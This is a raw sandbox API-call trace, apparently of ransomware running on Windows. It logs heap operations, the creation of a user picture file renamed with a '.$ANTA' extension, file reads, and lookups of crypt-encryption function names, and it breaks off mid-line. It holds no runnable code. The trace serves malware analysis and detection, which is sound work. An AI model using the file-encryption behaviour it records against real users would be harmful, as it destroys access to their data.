[0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0092.651] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0092.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0092.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0092.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0092.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0092.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.652] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7ykcclus8obszjabi0l.bmp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.653] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0092.653] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0092.653] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0092.653] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0092.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0092.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e06020 [0092.657] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0092.657] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xc713, lpOverlapped=0x0) returned 1 [0092.659] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0092.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc713) returned 0x4516010 [0092.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e06020 | out: hHeap=0x1780000) returned 1 [0092.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0092.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc713) returned 0x4522730 [0092.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0092.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.662] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc713) returned 0x4516010 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.663] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0092.663] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.663] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0092.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0092.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc713) returned 0x4516010 [0092.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc713) returned 0x452ee50 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0092.665] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0092.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0092.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0092.665] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0092.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0092.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.666] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0092.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0092.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0092.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa78 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0092.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0092.666] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0092.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.667] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0092.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.668] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0092.668] 